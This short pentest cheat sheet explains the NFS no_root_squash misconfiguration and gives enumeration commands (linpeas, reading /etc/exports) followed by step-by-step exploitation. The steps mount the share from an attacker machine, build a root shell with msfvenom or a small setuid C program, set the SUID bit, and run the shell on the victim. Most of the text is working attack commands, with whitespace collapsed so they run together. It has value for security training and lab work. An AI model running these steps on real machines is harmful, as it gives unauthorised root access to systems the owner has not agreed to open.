No_root_squash: This option basically gives authority to the root user on the client to access files on the NFS server as root. And this can lead to serious security implications.
Check /etc/exports file, if you find some directory that is configured as no_root_squash, then you can access it from as a client and write inside that directory as if you were the local root of the machine.
Enumeration
# linpeas will detect the no_root_squash option./linpeas.sh# Manual Checkcat/etc/exports# /tmp *(rw,sync,insecure,no_root_squash,no_subtree_check) cat/etc/lib/nfs/etab
Exploitation
# Check export listshowmount-e192.168.142.154# Mount the nfs share at kalimkdir/tmp/nfsmount-orw,vers=2192.168.142.154:/tmp/tmp/nfs# Create a shellmsfvenom-plinux/x86/execCMD="/bin/bash -p"-felf-o/tmp/nfs/shell.elf# orecho'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }'>/tmp/nfs/shell.cgcc/tmp/nfs/shell.c-o/tmp/nfs/shell.elf# Add SUID bitchmod+xs/tmp/nfs/shell.elf# Run the shell on victim machine/tmp/shell.elf